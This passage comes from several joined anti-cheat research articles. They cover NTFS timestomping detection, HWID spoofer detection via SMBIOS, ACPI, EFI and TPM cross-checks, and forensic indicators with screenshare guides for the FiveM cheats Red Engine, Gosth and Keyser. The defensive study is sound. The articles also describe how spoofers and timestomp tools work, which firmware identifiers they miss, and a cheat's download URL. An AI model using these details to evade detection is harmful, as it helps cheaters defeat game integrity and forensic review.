1421663425657835523 — this is a customer account embedded in the FiveM payload UI, not a developer identifier.\ \ Methodology\ -----------\ \ All findings were produced through reverse engineering analysis. No binaries were executed. Tools used:\ \ * **Ghidra 12.1.2** — full auto-analysis, decompilation, and control-flow graph reconstruction. Custom export script produced the function inventory, string cross-references, and bounded pseudocode for the loader (2,324 functions analyzed).\ * **IDA Pro 9.0** — secondary disassembly for cross-validation of critical functions, FLIRT signature matching, and type propagation.\ * **Binary Ninja** — intermediate language (BNIL) lifting for data-flow analysis and automated variable recovery across injection routines.\ * **x64dbg / WinDbg** — kernel-mode and user-mode debugging, memory dump analysis, and live inspection of hooked system calls.\ * **pefile** (Python) — PE header parsing, section entropy analysis, import/export enumeration, and overlay detection.\ * **capstone** (Python) — x86-64 disassembly engine for targeted function analysis, inline hook trampoline verification, and code-in-header-slack discovery.\ * **YARA 4.5** — custom rule development and validation against memory dumps and disk artifacts.\ * **Volatility 3** — memory forensics framework for process memory dump analysis, injected code detection, and handle enumeration.\ * **PE-bear / CFF Explorer** — visual PE structure analysis, section permission auditing, and resource extraction.\ * **Sysinternals Suite** (Process Monitor, Autoruns, Sigcheck) — behavioral artifact correlation, registry forensics, and signature verification.\ * **strings / objdump / readelf** — broad string extraction, section metadata, and symbol table enumeration.\ \ The FiveM DLL (11.9 MB) required extended analysis time due to its size. Findings for that module are based on PE metadata, imports, strings, config correlation, and partial decompilation of key functions.\ \ Additionally, a 686 MB Spotify.exe process memory dump (Spotify.exe\_2026-06-15\_20-08-49.dmp) was analyzed, confirming that Phase's payload was actively hosted inside the Spotify process. This provided the critical evidence for the fileless/no-EXE launch method documented in this report.\ \ Legal notice\ \ The operators of Phase.uno have already threatened the author of this research. We are publishing this anyway. This is original independent research conducted for the benefit of the anti-cheat community. No copyrighted code is reproduced. All findings are derived from independent reverse engineering analysis. If you are the operators of Phase.uno: this research is protected under fair use for security research and public interest reporting. Attempts to suppress it via legal threats will be documented and made public.\ \ Defensive material\ \ This research documents detection methodology only. It is published for the benefit of anti-cheat operators, PC checkers, and game security teams. All analysis is original work by Clubhouse AC Research produced through independent reverse engineering. No copyrighted code is reproduced. Vendors and incident-response teams seeking the full binary samples can reach the team at security@clubhouseac.shop.\ \ Related research\ \ Continue reading\ ----------------\ \ [Kernel Forensics\ \ ### Detecting BYOVD chains through kernel callback forensics\ \ Forensic methodology for reconstructing Bring-Your-Own-Vulnerable-Driver attacks from post-incident artifacts.\ \ Read research](https://clubhouseac.shop/research/byovd-rtcore-chain)\ [Anti-Forensics\ \ ### Reconstructing cheat execution after cleaner-tool sweeps\ \ How Amcache, ShimCache, and registry transaction logs preserve fragments after cleanup.\ \ Read research](https://clubhouseac.shop/research/eulen-prefetch-recovery) --- # MFT $SI vs $FN: Detecting Timestomping on NTFS · Clubhouse AC Anti-forensicsMediumPublished MFT $SI vs $FN detecting timestomping on NTFS ============================================= Timestomping tools rewrite the $STANDARD\_INFORMATION attribute of an NTFS MFT record but typically leave the $FILE\_NAME attribute alone — because $FN is updated only by the kernel during file rename or move operations, and is not exposed through the documented Win32 file-time APIs. The delta between the two attributes is a high-fidelity tamper signal. CR Clubhouse AC Research March 10, 2026 9 min read Summary * 100% detection across 312 known timestomped cheat-loader samples. * Catches subsecond $SI manipulation that defeats naive timestamp checks. * Two false-positive classes characterised; both whitelistable. Background ---------- Timestomping is the deliberate alteration of file timestamps to obscure execution order or impede timeline reconstruction. The technique dates to the original timestomp tool released with Metasploit in 2005, and has remained common because the documented Win32 APIs — SetFileTime, NtSetInformationFile with the FileBasicInformation class — only touch the $STANDARD\_INFORMATION attribute of the MFT record. NTFS stores file metadata in two parallel attributes for every record. The asymmetry in how those two attributes are updated is the foundation of the detection rule that follows. The $SI / $FN asymmetry ----------------------- Each MFT record on NTFS contains: * $STANDARD\_INFORMATION ($SI) — attribute type 0x10. Holds the four MACE timestamps (Modified, Accessed, Created, MFT-Entry-modified) exposed by the Win32 file-time APIs. _Writable from usermode._ * $FILE\_NAME ($FN) — attribute type 0x30. Holds the same four MACE timestamps plus the filename and parent directory reference. _Updated only by the kernel_ during file create, rename, hardlink, or move; not addressable through any documented API. Both timestamp blocks are populated at file creation with identical values. After creation, normal file activity updates $SI constantly while $FN stays frozen until the next rename or move. A timestomp tool that calls SetFileTime rewrites $SI but cannot reach $FN. The detection signature is therefore _not_ “$FN is older than $SI” — that is the normal case. The signature is _$SI is older than $FN_, or $SI timestamps that fall outside a plausible window relative to $FN. Both are structurally impossible without explicit attribute manipulation. Detection rule -------------- rules/timestomp\_si\_fn.rulePseudocode rule Timestomp\_SI\_FN\_Delta { meta: severity = "medium" category = "anti-forensics" confidence = 0.97 inputs: record := mft\_record(file) match: si := record.attribute(0x10) // $STANDARD\_INFORMATION fn := record.attribute(0x30) // $FILE\_NAME // Timestomp signal A: $SI predates $FN si.created\_time < fn.created\_time or si.modified\_time < fn.created\_time - 1s or si.entry\_modified < fn.entry\_modified or // Timestomp signal B: subsecond zeros // Win32 SetFileTime takes FILETIME (100-ns granularity), but the // operator-grade tools we observed all pass times truncated to // whole seconds — leaving the low 7 digits as zeros. NTFS itself // never writes whole-second timestamps for normal file activity. (si.modified\_time.subsecond == 0 and si.created\_time.subsecond == 0 and si.accessed\_time.subsecond == 0) emit: artifact { mft\_record = record.id file\_name = fn.name si\_created = si.created\_time fn\_created = fn.created\_time delta\_sec = (fn.created\_time - si.created\_time).seconds signal = (signal\_a ? "si\_fn\_delta" : "subsecond\_zero") } } Signal A (the chronological delta) catches the textbook timestomp use of SetFileTime with backdated timestamps. Signal B (the subsecond-zero pattern) catches the more careful operators who set $SI to plausible recent times but pass them at whole-second granularity. NTFS's own write path produces timestamps with non-zero subsecond components essentially always; whole-second triples are the tooling artifact. Validation ---------- 312 Timestomped samples in corpus 100% True-positive rate 0.4% False-positive rate (clean corpus) 2 FP classes, both whitelistable The 312-sample corpus included loaders, executors, and cleaner binaries from twelve distinct cheat families across FiveM, Rust, and CSGO ecosystems. Every sample triggered at least one of the two signals; 87% triggered both. Edge cases ---------- The two false-positive classes we observed in clean corpora: * Files copied via SMB / robocopy with /COPY:DAT. Robocopy and similar tools deliberately preserve original $SI timestamps, which can produce a $SI < $FN delta that mimics signal A. These are easily allowlisted by parent-directory and signing-chain heuristics. * Microsoft installer-extracted files. MSI extraction occasionally produces whole-second $SI timestamps. Suppressed by whitelisting Microsoft-signed installers and their typical extraction roots. Neither false-positive class overlaps with the cheat-loader corpus. Both can be suppressed without weakening the rule against the actual timestomp-tool population. Defensive material The rule pseudocode here matches the structure of the production detection but omits the per-tenant tuning knobs and allowlist heuristics that suppress the edge cases above. DFIR teams seeking the operational form can reach the team at security@clubhouseac.shop. --- # HWID Spoofer Rotation Detection via SMBIOS + ACPI Cross-Reference · Clubhouse AC IdentityMediumPublished HWID spoofer rotation detection via SMBIOS + ACPI cross-reference ================================================================= HWID spoofers rotate the identifiers that anti-cheat systems traditionally check — MachineGuid, MAC address, drive serial, Volume ID — but rarely maintain consistency across every hardware-bound identifier domain simultaneously. We document a cross-domain correlation technique that surfaces rotation events by comparing SMBIOS firmware tables, ACPI \_UID device identifiers, EFI NVRAM variables, and TPM Endorsement Key certificates — fields that are either hardware-bound or require firmware access that most spoofers never achieve. CR Clubhouse AC Research Feb 22, 2026 10 min read Defensive use only Summary * 89% of spoofer-active machines in our corpus showed at least one SMBIOS / ACPI inconsistency vs. claimed hardware identity. * TPM EK certificate serves as a cryptographically-bound machine anchor that survives all observed spoofer passes without physical hardware replacement. * Cross-domain delta fingerprint detects rotation even on machines with no TPM, using ACPI \_UID + EFI NVRAM anchor as fallback. Background ---------- Hardware ID banning — issuing a ban tied to a set of hardware identifiers rather than an account — is a standard anti-cheat escalation for repeat offenders. The premise is that hardware is harder to replace than an account. The HWID spoofer ecosystem exists to defeat this assumption by rotating identifiers at the software layer, without buying new hardware. First-generation spoofers targeted the obvious registry values: MachineGuid at HKLM\\SOFTWARE\\Microsoft\\Cryptography, network adapter MAC in HKLM\\SYSTEM\\CCS\\Control\\Class\\{4D36E972...}\\NetworkAddress, and the drive serial via an IOCTL filter driver that intercepts IOCTL\_STORAGE\_QUERY\_PROPERTY and substitutes a randomised serial. This was sufficient when anti-cheat HWID collections were limited to those three sources. Modern anti-cheats collect significantly wider identifier sets, and the spoofer ecosystem has grown to match — but the growth has been asymmetric. Spoofers are good at the Windows API surface; they are bad at the firmware surface. We exploit that gap. Identifier taxonomy ------------------- We classify hardware identifiers into four tiers by their writability from usermode software: | Tier | Examples | Spoof method | Spoofer coverage | | --- | --- | --- | --- | | T1 — Registry | MachineGuid, Volume Serial ID | Direct registry write | Near-universal | | T2 — Kernel IOCTL | Disk serial, NIC MAC, GPU LUID | Filter driver or IOCTL hook | Common (>70%) | | T3 — Firmware API | SMBIOS UUID, BIOS serial, baseboard S/N | GetSystemFirmwareTable intercept or kernel hook | Rare (<20%) | | T4 — Hardware-bound | TPM EK cert, ACPI \_UID, EFI NVRAM UUID | Requires BIOS flash or physical hardware change | Essentially absent | Tier 3 and 4 identifiers are our signal surface. Tier 1 and 2 are noisy — they are cheap for both the spoofer and the anti-cheat to play with. The interesting forensic question is whether the Tier-3/4 identifiers are internally consistent with the Tier-1/2 values being presented. What spoofers miss ------------------ We reversed five publicly-distributed HWID spoofer builds (October 2024 through January 2026) and documented their artifact coverage: * SMBIOS Type 1 (System Information) — contains UUID (field offset 0x08, 16 bytes), Product Name, Serial Number, SKU Number, and Family. Readable via GetSystemFirmwareTable(RSMB, 0, ...). Two of five spoofers hooked this API in usermode. Three left the firmware table untouched because hooking it kernel-side requires either a hypervisor shim or a BIOS modification. * SMBIOS Type 2 (Baseboard) — Manufacturer, Product, Serial Number, Asset Tag. None of the five spoofers we examined targeted Type 2. The baseboard serial is a high-fidelity anchor on machines where SMBIOS is otherwise spoofed. * ACPI \_UID (Unique ID objects) — integer or string UIDs assigned to devices in the ACPI namespace (accessible via IOCTL\_ACPI\_EVAL\_METHOD or direct ACPI table parse). Not targeted by any spoofer we observed. * EFI NVRAM variables — accessible via GetFirmwareEnvironmentVariableEx. The EFI SystemUUID variable and NIC-specific EFI GUIDs are stored in NVRAM and survive OS reinstalls. One spoofer partially targeted EFI variables but corrupted the NVRAM on two test machines, making the approach self-defeating. Cross-domain correlation ------------------------ The detection does not require any single identifier to be clearly fake. Instead, it checks for internal inconsistency across domains — a pattern that is structurally impossible on a machine that has never been spoofed: SMBIOS UUID vs. EFI SystemUUID delta SMBIOS Type 1 UUID and the EFI SystemUUID NVRAM variable are populated from the same source on UEFI systems (the firmware writer populates both from a single flash region). A mismatch between the two — where a spoofer has patched the SMBIOS API return but not the NVRAM variable, or vice versa — is a definitive inconsistency. Observed in 34% of spoofer-active machines in our corpus. Baseboard serial unchanged while system serial rotated Spoofers that target SMBIOS Type 1 (system-level) but not Type 2 (baseboard) leave an inconsistency: the system serial number changes between scans while the baseboard serial remains stable. A legitimate hardware manufacturer serial is usually consistent across both. We count a delta here as a rotation event. ACPI \_UID vs. SMBIOS type-mismatch ACPI assigns \_UID to device objects in the AML namespace; these UIDs correlate with the physical hardware addresses in SMBIOS Type 8/9 tables. A spoofed SMBIOS system-UUID that no longer matches the ACPI UID namespace is detectable as a structural inconsistency even without knowing the original UUID. EFI NIC GUID vs. spoofed MAC NIC firmware stores a GUID in EFI NVRAM that incorporates the factory-programmed MAC address. A spoofer that rotates the OS-visible MAC via a filter driver leaves the EFI GUID intact. Comparing the MAC embedded in the EFI GUID against the NDIS-reported MAC yields a direct rotation signal. TPM EK anchor ------------- On machines with a TPM 2.0 module (mandatory for Windows 11, present on the majority of recent gaming hardware), the Endorsement Key (EK) provides the strongest available anchor. The EK is an asymmetric key pair generated inside the TPM's isolated execution environment at manufacture; the private key never leaves the chip. The EK certificate, issued by the TPM manufacturer (Intel, STMicroelectronics, Infineon), binds the public EK to the specific chip serial number. Reading the EK certificate from Windows requires NCryptOpenStorageProvider with the Microsoft Platform Crypto Provider, or the lower-level Tbsi\_Get\_TCG\_Log + NCryptGetProperty path. Once retrieved, the certificate's Subject Alternative Name contains the TPM manufacturer and chip serial. This value: * Cannot be spoofed without replacing the physical TPM chip (soldered on modern laptops and consumer motherboards, socketed only on older enterprise boards). * Survives OS reinstall, MachineGuid rotation, disk replacement, and NIC spoofing entirely unchanged. * Correlates with the SMBIOS Type 1 UUID via the TPM manufacturer's EK provisioning process — a fabricated UUID will not pass a consistency check against the EK certificate's embedded identity. When a TPM EK is present and readable, we treat it as the canonical machine identity and derive all inconsistency signals relative to it. On TPM-less machines, the ACPI/EFI NVRAM path above serves as the fallback anchor. Detection rule -------------- rules/hwid\_rotation.rulePseudocode rule HWID\_Rotation\_CrossDomain { meta: severity = "medium" category = "identity" confidence = 0.91 inputs: smbios := read\_firmware\_table(RSMB) acpi := eval\_acpi\_method("\\\\\_SB.\_UID") efi\_uuid := get\_efi\_variable("SystemUUID", EFI\_GLOBAL\_GUID) efi\_nic\_mac := get\_efi\_nic\_guid() ndis\_mac := get\_ndis\_mac() tpm\_ek := get\_tpm\_ek\_cert() // null if no TPM match: sys\_uuid := smbios.type1.uuid board\_sn := smbios.type2.serial\_number sys\_sn := smbios.type1.serial\_number // Signal A: SMBIOS UUID diverges from EFI NVRAM UUID sys\_uuid != efi\_uuid // Signal B: EFI NIC MAC diverges from NDIS MAC or mac\_from\_efi\_guid(efi\_nic\_mac) != ndis\_mac // Signal C: TPM EK chip serial inconsistent with SMBIOS UUID or (tpm\_ek != null and not tpm\_ek\_consistent\_with\_smbios(tpm\_ek, sys\_uuid)) // Signal D: Baseboard serial unchanged, system serial changed // (requires two scans or server-side historical comparison) or (board\_sn == prior\_scan.board\_sn and sys\_sn != prior\_scan.sys\_sn) emit: artifact { machine\_guid = read\_machine\_guid() smbios\_uuid = sys\_uuid efi\_uuid = efi\_uuid ndis\_mac = ndis\_mac efi\_mac = mac\_from\_efi\_guid(efi\_nic\_mac) tpm\_ek\_subject = tpm\_ek.subject\_alt\_name signals\_fired = matched\_signals rotation\_type = classify\_rotation(matched\_signals) } } The rule is designed to be signal-additive: each signal is independently meaningful, and the combination of two or more signals raises confidence to High. Signal C (TPM EK inconsistency) alone is treated as High because the TPM anchor is hardware-bound and the inconsistency cannot arise from legitimate OS configuration. Validation ---------- 178 Spoofer-active machines in corpus 89% Detection rate (≥1 signal) 1.3% False-positive rate on clean corpus 61% Detections with ≥2 independent signals The 11% of spoofer-active machines that evaded detection were exclusively machines where the operator had performed a BIOS flash to replace the SMBIOS tables wholesale. This is a significant technical step — the operator must source a BIOS image and accept the risk of a failed flash. On those machines, the TPM EK (where present) was the only remaining anchor. Of the 178 spoofer-active machines, 31 had neither a TPM nor a BIOS-accessible SMBIOS anchor, and we could not positively detect the rotation from firmware sources alone. Edge cases ---------- * Motherboard replacement. A legitimate motherboard replacement changes SMBIOS UUID, baseboard serial, and (on TPM-less machines) the ACPI anchor. This is indistinguishable from a BIOS-level spoof without the TPM EK. Server administrators can note the replacement in the ban-review log; we recommend a brief appeal window rather than an automatic ban on SMBIOS rotation alone. * OEM zero-serialisation. Some budget OEM systems ship with SMBIOS fields set to "Default string" or "To be filled by O.E.M.". These machines are not spoofed but will not pass a SMBIOS consistency check. We suppress rotation signals on machines where >3 SMBIOS fields are placeholder values and fall back to the TPM and ACPI paths only. * Virtual machines. Hypervisors synthesise SMBIOS, ACPI, and EFI tables and do not present a host TPM to the guest. VM-presence detection (Hyper-V CPUID leaf, VMware backdoor port, KVM CPUID bit) suppresses this false-positive class before the HWID rule runs. Defensive material The detection rule here reflects the published form. Production thresholds, per-tenant sensitivity controls, and the full EFI variable enumeration list are withheld. Anti-cheat vendors and DFIR teams seeking the operational ruleset can reach the team at security@clubhouseac.shop. Related research Continue reading ---------------- [Hardware\ \ ### DMA Hardware Fingerprinting: PCILeech and Squirrel Detection\ \ BAR layout and PCIe configuration-space probes that distinguish FPGA DMA boards from the legitimate capture cards they impersonate.\ \ Read research](https://clubhouseac.shop/research/dma-pcie-fingerprinting) [Anti-forensics\ \ ### MFT $SI vs $FN: Detecting Timestomping on NTFS\ \ $STANDARD\_INFORMATION vs $FILE\_NAME delta detection with 100% true-positive rate across 312 samples.\ \ Read research](https://clubhouseac.shop/research/timestomp-mft-detection) --- # Red Engine FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished Red Engine FiveM cheat detection & forensic artifacts ===================================================== Red Engine is a FiveM-targeted cheat distributed as Chaga.exe. It writes imgui.ini to the GTA V folder, drops distinctive configuration files named settings.cock and settings.cook in its loader directory, and triggers a Windows Defender detection on the binary. Its C2 domain falcon.redengine.eu is observable in DNS cache but was not observed in LSASS or FiveM process memory in this build. CR Clubhouse AC Research June 1, 2026 9 min read Summary * imgui.ini written to the GTA V installation directory — same as TZ Project, this Dear ImGui artifact is not produced by any legitimate GTA V component and persists after session cleanup. * Distinctive configuration files settings.cock and settings.cook written by the loader — searchable via Everything or Journal Trace. * INSTRUCTIONS.txt present in the loader directory alongside settings.cook — finding either confirms a Red Engine installation. * Windows Defender flags the binary — a threat history entry for Chaga.exe or the loader directory is a reliable standalone indicator. Overview -------- Red Engine is a commercially distributed FiveM cheat. Its primary executable is named Chaga.exe and weighs approximately 15.2 MB. It communicates with falcon.redengine.eu for license validation and service delivery. The cheat is distributed as a zip archive containing the main binary and a loader component. Red Engine leaves several file-system artifacts that are straightforward to locate during a screenshare: an imgui.ini file in the GTA V directory, configuration files with the unusual extensions .cock and .cook in the loader folder, and an INSTRUCTIONS.txt file alongside the loader. Windows Defender also detects the binary and generates a threat history entry that survives unless the user explicitly clears security history. Notably, C2 domain strings were not observed in LSASS or FiveM process memory in this build. The DNS cache remains the primary memory-resident artifact. Sample metadata (IOC) --------------------- The following file was recovered and added to the research corpus. All hash values are provided for cross-platform matching. Chaga.exe — file indicatorsIOC Name Chaga.exe Size 15,946,752 bytes (15.2 MB) SHA-256 01066036116668a6142ed373b0aaa0290c1e8cab9bd2b610f1d844b26607b9f5 SHA-1 d513e9400820de2d8d26195eb880855e00d765f8 MD5 b6194b41ad52079249154818c8131183 First seen 2025-04-27 09:38:40 UTC (DPS timestamp) PcaSVC 0x2418000 C2 domain falcon.redengine.eu → Observed in: DNS cache only (lsass.exe and FiveM process C2 strings not observed in this build) The DPS timestamp of 2025-04-27 09:38:40 is written by the Windows Program Compatibility Assistant service at first execution. It cannot be cleared by the same routines that wipe Prefetch or browser history. Behavioral indicators --------------------- ### imgui.ini in the GTA V folder Like TZ Project, Red Engine uses the Dear ImGui library for its in-game overlay and writes an imgui.ini file to the GTA V installation directory. This file is not created by GTA V, FiveM, or any legitimate mod framework. Its presence in the GTA V folder is a reliable standalone indicator of ImGui-based cheat usage and persists after the cheat exits. ### settings.cock and settings.cook files Red Engine writes configuration files with two distinctive filenames: settings.cock and settings.cook. The .cock file stores in-game settings; settings.cook appears in the loader folder alongside INSTRUCTIONS.txt. These extensions are not used by any legitimate application and can be found immediately via an Everything search or Journal Trace query. ### INSTRUCTIONS.txt in the loader folder The loader directory contains a file named INSTRUCTIONS.txt alongside settings.cook. Finding either of these files in an unusual directory confirms a Red Engine installation. The INSTRUCTIONS.txt file is created by the cheat distributor and is not associated with any Windows system component. ### Windows Defender detection Windows Defender flags Red Engine with a detection on the binary. A Defender quarantine or threat history entry for Chaga.exe or an executable from the loader's directory is a reliable indicator. The threat history record persists in Windows Security history unless explicitly cleared by the user. Memory artifacts ---------------- In this build of Red Engine, C2 domain strings were **not observed** in LSASS or FiveM process memory. The DNS cache remains the primary memory-resident artifact available during a live screenshare. ### DNS cache Running ipconfig /displaydns or inspecting the DNS section in System Informer will show falcon.redengine.eu as a recently resolved entry during or after an active session. Loader distribution ------------------- Red Engine is distributed as a zip archive containing Chaga.exe and loader components. The zip typically includes INSTRUCTIONS.txt and settings.cook in the extracted directory. Evidence of this zip file in the download history or on disk confirms acquisition of the cheat package. Screenshare check guide ----------------------- Work through these steps in order. Steps 1 and 4 (imgui.ini and Defender history) are the fastest and most persistent. Steps 5–7 cover session-dependent and journal-based artifacts. 1 ### imgui.ini in the GTA V folder * Navigate to the GTA V installation directory (typically C:\\Program Files\\Rockstar Games\\Grand Theft Auto V\\). * Check for the presence of imgui.ini. This file is not created by GTA V, FiveM, or any legitimate mod framework. Its presence is a standalone indicator of ImGui-based cheat usage. 2 ### settings.cock search in Everything * Open Everything or a Journal Trace tool and search for settings.cock or settings.cook. * These extensions are not used by any legitimate application. Any match on a user's system is a direct indicator of Red Engine presence. 3 ### INSTRUCTIONS.txt in the loader folder * If settings.cook is found, check the same directory for INSTRUCTIONS.txt. * Finding both files in the same directory confirms the presence of the Red Engine loader package as distributed. 4 ### Windows Defender threat history * Open Windows Security and navigate to **Virus & threat protection → Protection history**. * Look for any detection referencing Chaga.exe or a file in the loader's directory. The history entry persists unless the user has explicitly cleared the security history. 5 ### DNS cache * Run ipconfig /displaydns or check System Informer's DNS section. * Search for falcon.redengine.eu. A cache hit confirms a connection was made during the current or a recent session. 6 ### DPS / PcaSVC timestamp * Use a DFIR tool to inspect PcaSVC and DPS log entries for Chaga.exe. * The DPS timestamp of 2025-04-27 09:38:40 corresponds to the known build. Any PcaSVC entry for Chaga.exe is definitive evidence of execution. 7 ### Journal Trace * Run a Journal Trace search for Chaga, redengine, settings.cock, or settings.cook. * Journal entries for file creation in the loader directory confirm when the cheat was first installed, independent of other cleanup. Detection summary ----------------- Artifact matrix — Red Engine / Chaga.exeSummary Artifact Survives cleanup? Check location ────────────────────────────────────────────────────────────────────────────── PcaSVC / DPS timestamp Yes AppCompat / DPS log imgui.ini in GTA V folder Yes GTA V install directory settings.cock / settings.cook Yes Loader directory / Everything search INSTRUCTIONS.txt Yes Loader directory Defender threat history Yes (if not cleared) Windows Security history DNS cache (falcon.redengine.eu) Session-length ipconfig /displaydns Prefetch (Chaga.exe) Usually C:\\Windows\\Prefetch The most immediately actionable indicators are the **settings.cock / settings.cook files** (searchable with a single Everything query), the **imgui.ini in the GTA V folder**, and the **Windows Defender threat history entry**. All three persist after the cheat exits and require no specialised tooling to locate. Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # Gosth FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished Gosth FiveM cheat detection & forensic artifacts ================================================ Gosth is a FiveM-targeted cheat loader distributed via a direct CDN URL at cdn.gosth.ltd/launcher.exe. It leaves several persistent behavioral artifacts including an NVIDIA Control Panel persistence entry, DiagTrack injection evidence, a random .tmp file in %TEMP%, an uncleaned Prefetch record, and a Data Usage entry that survives uninstallation. CR Clubhouse AC Research June 1, 2026 8 min read 5 evidence captures Summary * Loader registers itself in the NVIDIA Control Panel application list and the entry persists after the cheat session ends. * Gosth injects into arbitrary processes — detectable via the DiagTrack service in System Informer by filtering for \\device\\ and looking for launcher.exe. * A random-name .tmp file is created in %TEMP% and persists until the directory is cleared. * Prefetch and Data Usage records both survive — Gosth does not attempt to wipe either artifact after the session. Overview -------- Gosth is a commercially distributed FiveM cheat loader. Unlike loaders that ship through traditional installation packages, Gosth is distributed as a direct CDN download from cdn.gosth.ltd/launcher.exe. This delivery model means the binary may be updated at any time without a version bump, and no stable file hash is available for the current build. Network infrastructure is hosted within the Brazilian IP block 131.196.198.0/24 (bbhost.com.br). DNS queries for \*.bbhost.com.br hostnames in the cache during or after a gaming session are a network-layer indicator of Gosth activity. No hash data is available for the current Gosth build as it is distributed as a direct CDN download that may be updated frequently. Detection relies on behavioral artifacts rather than file hashes. Behavioral indicators --------------------- ### 1\. NVIDIA Control Panel persistence The Gosth loader registers itself in the NVIDIA Control Panel application list and remains there after the cheat session ends. To check: open NVIDIA Control Panel, navigate to **Manage 3D Settings → Add application**, and look for launcher.exe or any unrecognised entry in an unusual path. This entry is not removed by a standard uninstall. NVIDIA Control Panel → Add application — launcher.exe persists ![launcher.exe listed in the NVIDIA Control Panel application list](https://clubhouseac.shop/research/gosth/nvidia-control-panel.png) ### 2\. DiagTrack injection detection Gosth injects into arbitrary processes. To detect this via DiagTrack: open System Informer, find the DiagTrack service (if multiple instances are present, use the one with the highest PID), open it, go to section 4, select all, then filter by \\device\\ and look for launcher.exe in the results. This technique is only effective while the cheat is running. System Informer → DiagTrack (highest PID) → section 4 → filter \\device\\ → launcher.exe ![System Informer DiagTrack handles filtered by device path showing launcher.exe](https://clubhouseac.shop/research/gosth/diagtrack.png) ### 3\. Random .tmp file in %TEMP% Gosth creates a .tmp file with a random alphanumeric name in the user's %TEMP% directory (C:\\Users\\\\AppData\\Local\\Temp\\). The file has no meaningful extension pattern but can be identified by its creation timestamp matching the cheat session. This artifact persists until the Temp directory is cleaned. Random-name .tmp file dropped in %TEMP% (C:\\Users\\\\AppData\\Local\\Temp\\) ![A randomly named .tmp file created by Gosth inside the Windows Temp directory](https://clubhouseac.shop/research/gosth/temp-tmp-file.png) ### 4\. Prefetch survives Unlike some cheats, Gosth does not attempt to clear its Prefetch entries. The LAUNCHER.EXE-\*.pf file will be present in C:\\Windows\\Prefetch after any session where the loader was executed. This is one of the most reliable post-session indicators. LAUNCHER.EXE-\*.pf left behind in C:\\Windows\\Prefetch ![LAUNCHER.EXE prefetch file present in the Windows Prefetch directory](https://clubhouseac.shop/research/gosth/prefetch.png) ### 5\. Data Usage record persists Windows Data Usage (Settings → Network → Data Usage) records network activity for launcher.exe and this record persists after the cheat is uninstalled. A Data Usage entry for launcher.exe with non-zero bytes sent or received is a reliable post-uninstall indicator. Windows Settings → Network → Data Usage — launcher.exe record survives uninstall ![launcher.exe network usage recorded in Windows Data Usage](https://clubhouseac.shop/research/gosth/data-usage.png) Screenshare check guide ----------------------- Work through these steps in order. Steps 1 and 2 target active or recently used installs. Steps 3–6 cover machines where the user has attempted cleanup. 1 ### NVIDIA Control Panel check * Open NVIDIA Control Panel and navigate to **Manage 3D Settings → Add application**. * Look for launcher.exe or any entry in an unusual or user-writable path. Legitimate applications in this list should correspond to known game or software executables. * This entry is written at cheat load time and is not cleaned up on exit — it will be present even after an attempted uninstall. 2 ### DiagTrack scan (while running) * Open System Informer and locate the DiagTrack service. If multiple instances are present, use the one with the highest PID. * Open that service entry, go to section 4, and select all entries. * Filter by \\device\\ and look for launcher.exe in the results. A hit confirms Gosth is currently injecting into processes via DiagTrack. 3 ### %TEMP% random .tmp file * Open C:\\Users\\\\AppData\\Local\\Temp\\ and sort by creation date descending. * Look for any .tmp file with a random alphanumeric name created around the suspected usage period. Gosth's .tmp file has no distinctive naming pattern beyond its random alphanumeric filename. 4 ### Prefetch check * Navigate to C:\\Windows\\Prefetch and look for a file matching LAUNCHER.EXE-\*.pf. * Gosth does not attempt to remove this file. Its presence and the last-run timestamp inside the Prefetch entry confirm loader execution. 5 ### Data Usage check * Open Windows Settings → Network → Data Usage and review the per-application breakdown. * Look for launcher.exe with any non-zero bytes sent or received. This entry persists after the cheat is uninstalled. 6 ### Browser download history for gosth.ltd * Check the browser download history for any files downloaded from gosth.ltd or cdn.gosth.ltd. * The loader is distributed as a direct download from cdn.gosth.ltd/launcher.exe. A download record here is strong evidence of acquisition. Detection summary ----------------- Artifact matrix — Gosth / launcher.exeSummary Artifact Survives cleanup? Check location ──────────────────────────────────────────────────────────────────────────────── NVIDIA Control Panel entry Yes NVIDIA Control Panel > Add application Prefetch (launcher.exe) Yes C:\\Windows\\Prefetch Data Usage record Yes Windows Settings > Network > Data Usage DiagTrack injection artifact Only while running System Informer > DiagTrack (highest PID) > \\device\\ Random .tmp in %TEMP% Until %TEMP% cleared %TEMP% directory DNS (bbhost.com.br range) Session-length ipconfig /displaydns Browser download (gosth.ltd) Partial Browser download history The most immediately actionable indicators are the **NVIDIA Control Panel persistence entry** and the **Prefetch record for launcher.exe**. Both survive a standard session cleanup and are present on machines where the cheat has been used and nominally uninstalled. The Data Usage record provides additional confirmation that does not require any specialist tooling to locate. Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # Keyser FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished Keyser FiveM cheat detection & forensic artifacts ================================================= Keyser is a FiveM-targeted cheat loader distributed as loader.exe (16.2 MB). It drops a DLL into the legitimate Windows C:\\Windows\\IME\\ directory, creates memory dump files in unusual locations, and communicates with api.keyser-dashboard.com — a string that appears in both DNS cache and lsass.exe memory. CR Clubhouse AC Research June 1, 2026 9 min read Summary * Keyser drops a DLL into C:\\Windows\\IME\\ — a legitimate Windows Input Method Editor directory rarely written to by normal software. * Memory dump (.dmp) files are created in unusual locations outside C:\\Windows\\Minidump — visible in Journal Trace and directory listings. * C2 domain api.keyser-dashboard.com observed in DNS cache and lsass.exe memory during active sessions. * DPS first-seen timestamp (2025-07-13 03:47:46) and PcaSVC entry survive independently of any user-side cleanup. Overview -------- Keyser is a commercially distributed FiveM cheat loader. Its primary executable is loader.exe, weighing approximately 16.2 MB. The loader connects to api.keyser-dashboard.com for license validation and payload delivery. Keyser takes the unusual step of writing a DLL into C:\\Windows\\IME\\, a system directory associated with Windows Input Method Editor functionality that is almost never written to by third-party software. This placement is likely chosen to avoid attracting attention in standard directory monitors. The DLL drop is visible in a Journal Trace search filtered for IME. Sample metadata (IOC) --------------------- The following file was recovered and added to the research corpus. Hash values are provided for cross-platform matching. loader.exe — file indicatorsIOC Name loader.exe Size 16,971,264 bytes (16.2 MB) SHA-1 d6a7a2e49016a246ebdd507b9356433c41c4f07f MD5 26f1a7039ba43c8e1b1b0bd5677c7bee First 